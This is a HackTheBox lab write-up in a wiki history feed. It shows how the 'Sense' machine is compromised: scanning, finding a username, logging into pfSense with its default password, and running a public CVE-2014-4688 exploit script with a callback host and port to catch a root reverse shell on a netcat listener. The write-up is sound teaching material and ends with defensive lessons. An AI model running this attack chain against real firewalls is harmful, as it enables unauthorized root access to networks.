https://book.ghanim.no/index.php?action=history&feed=atom&title=Write-ups%2FHTB%2FSenseWrite-ups/HTB/Sense - Revision history2026-04-21T16:17:31ZRevision history for this page on the wikiMediaWiki 1.45.1https://book.ghanim.no/index.php?title=Write-ups/HTB/Sense&diff=1191&oldid=previmported>Aghanim at 09:14, 22 February 20222022-02-22T09:14:02Z<p></p>
<p><b>New page</b></p><div>{{Infobox WriteUp<br />
| name = Sense<br />
| platform = HackTheBox<br />
| os = Linux<br />
| difficulty = Easy<br />
| techniques = pfSense Default Creds<br />
}}<br />
<br />
[[File:2022-02-image-14.png|thumb]]<br />
<br />
<br />
This Linux box was a easy box where I found a username and used the pfsense's default password, '''pfsense''', to get access to the firewall. Then I exploited a vulnerability that allowed authenticated users to execute arbitrary code to get a shell. The shell was root so there was no need for privilege escalation.<br />
<br />
<br />
----<br />
<br />
<br />
== Enumeration ==<br />
<br />
<br />
I'll start with a NMAP scan.<br />
<br />
<br />
<syntaxhighlight lang="bash"><br />
βββ(rootπkali)-[/home/aghanim/Desktop/HTB/sense]<br />
ββ# cat nmap.ver 1 β¨―<br />
# Nmap 7.92 scan initiated Mon Jan 31 15:48:25 2022 as: nmap -p- -sC -sV --min-rate 10000 -oN nmap.ver 10.10.10.60<br />
Nmap scan report for 10.10.10.60<br />
Host is up (0.031s latency).<br />
Not shown: 65533 filtered tcp ports (no-response)<br />
PORT STATE SERVICE VERSION<br />
80/tcp open http lighttpd 1.4.35<br />
|_http-server-header: lighttpd/1.4.35<br />
|_http-title: Did not follow redirect to https://10.10.10.60/<br />
443/tcp open ssl/http lighttpd 1.4.35<br />
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US<br />
| Not valid before: 2017-10-14T19:21:35<br />
|_Not valid after: 2023-04-06T19:21:35<br />
|_http-server-header: lighttpd/1.4.35<br />
|_ssl-date: TLS randomness does not represent time<br />
|_http-title: Login<br />
</syntaxhighlight><br />
<br />
<br />
There were only two ports open, port '''80 '''and port '''443. '''Visiting the websites it was showing a login page for PfSense. I tried the default username and password for pfsense, but that didnt work.<br />
<br />
<br />
[[File:2022-02-Pasted-image-20220131220529.png|thumb]]<br />
<br />
<br />
I continued with enumeration; I did a '''feroxbuster''' on port 443.<br />
<br />
<br />
βββ(rootπkali)-[/home/aghanim/Desktop/HTB/sense]<br />
ββ# feroxbuster --url https://10.10.10.60 --filter-status 401,402,403,404 -x txt --depth 1 --output ferox.result -k --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt<br />
<br />
___ ___ __ __ __ __ __ ___<br />
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__<br />
| |___ | \ | \ | \__, \__/ / \ | |__/ |___<br />
by Ben "epi" Risher π€ ver: 2.5.0<br />
ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββ<br />
π― Target Url β https://10.10.10.60<br />
π Threads β 50<br />
π Wordlist β /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt<br />
π Status Codes β [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]<br />
π’ Status Code Filters β [401, 402, 403, 404]<br />
π₯ Timeout (secs) β 7<br />
𦑠User-Agent β feroxbuster/2.5.0<br />
π Config File β /etc/feroxbuster/ferox-config.toml<br />
πΎ Output File β ferox.result<br />
π² Extensions β [txt]<br />
π HTTP methods β [GET]<br />
π Insecure β true<br />
π Recursion Depth β 1<br />
ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββ<br />
π Press [ENTER] to use the Scan Management Menuβ’<br />
ββββββββββββββββββββββββββββββββββββββββββββββββββ<br />
301 GET 0l 0w 0c https://10.10.10.60/themes => https://10.10.10.60/themes/<br />
301 GET 0l 0w 0c https://10.10.10.60/css => https://10.10.10.60/css/<br />
301 GET 0l 0w 0c https://10.10.10.60/includes => https://10.10.10.60/includes/<br />
301 GET 0l 0w 0c https://10.10.10.60/javascript => https://10.10.10.60/javascript/<br />
200 GET 10l 40w 271c https://10.10.10.60/changelog.txt<br />
301 GET 0l 0w 0c https://10.10.10.60/classes => https://10.10.10.60/classes/<br />
301 GET 0l 0w 0c https://10.10.10.60/widgets => https://10.10.10.60/widgets/<br />
301 GET 0l 0w 0c https://10.10.10.60/tree => https://10.10.10.60/tree/<br />
301 GET 0l 0w 0c https://10.10.10.60/shortcuts => https://10.10.10.60/shortcuts/<br />
301 GET 0l 0w 0c https://10.10.10.60/installer => https://10.10.10.60/installer/<br />
301 GET 0l 0w 0c https://10.10.10.60/wizards => https://10.10.10.60/wizards/<br />
301 GET 0l 0w 0c https://10.10.10.60/csrf => https://10.10.10.60/csrf/<br />
200 GET 7l 12w 106c https://10.10.10.60/system-users.txt<br />
301 GET 0l 0w 0c https://10.10.10.60/filebrowser => https://10.10.10.60/filebrowser/<br />
[####################] - 6m 441090/441090 0s found:14 errors:0<br />
[####################] - 6m 441090/441090 1098/s https://10.10.10.60<br />
<br />
<br />
</pre><br />
<br />
<br />
The '''--depth '''flag tells feroxbuster how "deep" to go into the subdirectories. Here I only want feroxbuster to go one level. I filter out status codes I dont want to see with '''--filter-status''' and use '''-k''' for insecure or ignore TLS.<br />
<br />
<br />
From the result there was some interesting subdirs and files.<br />
<br />
<br />
=== Subdirectories - changelog.txt and system-users.txt ===<br />
<br />
<br />
[[File:2022-02-Pasted-image-20220131221730.png|thumb]]<br />
<br />
<br />
From the changelog.txt we can see that it failed to update the firewall. Telling us that there might be a vulnerability we could exploit to get initial access.<br />
<br />
<br />
[[File:2022-02-Pasted-image-20220131230658.png|thumb]]<br />
<br />
<br />
Now we also have a username '''Rohit''' and the password is company defualt. That tells me that they use the default password for pfsense. Trying that gives me access to the dashboard for pfsense.<br />
<br />
<br />
== Initial Access ==<br />
<br />
<br />
=== Login to pfsense ===<br />
<br />
<br />
I used the credentials I've found with the default password for pfsense and logged in to pfsense.<br />
<br />
<br />
[[File:2022-02-Pasted-image-20220131232546.png|thumb]]<br />
<br />
<br />
We can see that it is running '''pfsense 2.1.3-RELEASE''' on '''FreeBSD 8.3-RELEASE-p16. '''<br />
<br />
<br />
=== Shell as Root ===<br />
<br />
<br />
A quick google search I find that the firewall is vulnerable to CVE-2014-4688.<br />
<br />
<br />
><br />
pfSense before 2.1.4 allows remote authenticated users to execute arbitrary commands via (1) the hostname value to diag_dns.php in a Create Alias action, (2) the smartmonemail value to diag_smart.php, or (3) the database value to status_rrd_graph_img.php.<br />
https://nvd.nist.gov/vuln/detail/CVE-2014-4688<br />
<br />
<br />
The firewall is vulnerable to execution of arbitrary commands with authenticated user. We have credentials so we can try to exploit the vulnerability to get a shell.<br />
<br />
<br />
I used [https://www.exploit-db.com/exploits/43560 this]script to get a shell. And [https://spencerdodd.github.io/2018/01/14/pfsense-arbitrary-code-execution/ this] blog have good explanation for the vulnerability.<br />
<br />
<br />
So lets run the script<br />
<br />
<br />
<syntaxhighlight lang="bash"><br />
βββ(rootπkali)-[/home/aghanim/Desktop/HTB/sense]<br />
ββ# python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.17 --lport 4444 --username rohit --password pfsense<br />
CSRF token obtained<br />
Running exploit...<br />
Exploit completed<br />
</syntaxhighlight><br />
<br />
<br />
βββ(rootπkali)-[/home/aghanim/Desktop/HTB/sense]<br />
ββ# nc -lvnp 4444<br />
listening on [any] 4444 ...<br />
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.60] 31868<br />
sh: can't access tty; job control turned off<br />
# whoami<br />
root<br />
<br />
</pre><br />
<br />
<br />
And we got a shell on our listener, and it is root. So that was a very quick and easy box.<br />
<br />
<br />
== What I've learned ==<br />
<br />
<br />
* Using default credentials is a big no. As we saw on this machine we were able to get a username and tried the default password for pfsense which gave us access to the dashboard. * Since pfsense was running as root we were able to exploit a vulnerability which gave us arbitrary command execution on the machine that gave us a root shell. * If the sysadmin would've patched the firewall this would not be possible.<br />
<br />
[[Category:HackTheBox]]<br />
[[Category:Linux]]<br />
[[Category:Write-ups]]</div>imported>Aghanim